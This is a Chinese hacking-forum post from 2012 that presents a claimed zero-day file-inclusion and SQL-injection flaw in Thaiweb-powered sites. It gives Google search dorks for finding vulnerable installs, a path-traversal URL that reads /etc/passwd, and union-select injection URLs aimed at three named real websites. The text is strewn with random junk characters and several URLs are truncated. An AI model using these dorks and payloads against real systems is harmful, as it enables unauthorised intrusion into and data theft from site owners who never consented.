找回密码
 立即注册
查看: 2885|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:$ `( J' _; P- ]( U( n
  f" q% G5 T. y: o5 z
intext:powered by Thaiweb
. I2 Q9 D$ w0 J" d  t  N" y# H* P$ j( [
inurl:index.php?page=board.php* W% u/ ^3 d6 S% I7 x) d
6 n( N8 h% b  B' @0 Q/ d( V
4 n9 z' W4 @# m' ?
1 I6 {. ?7 s2 G1 m
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
7 v) e  n" m7 ]# o0 V3 O+ g; N" |5 @8 R; j. U

4 g1 y7 O, f$ w, l# ~& x' J8 {8 d1 F: T
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
9 C# g2 h2 H$ s! e+ S
1 W6 E# L+ K  [) [& }/ C7 o' v  p
0 c2 H1 D6 J7 z$ K3 {; @. Z% w$ D- z$ a! W
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
4 C6 g- s9 h% c" v. y/ d0 P% r4 w8 u7 ]
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--4 ^/ W7 V( Q* p# P2 I/ w0 Q
/ w: }- m! m6 T
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--' J! |) z# ?- v& Q7 F# r2 b6 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表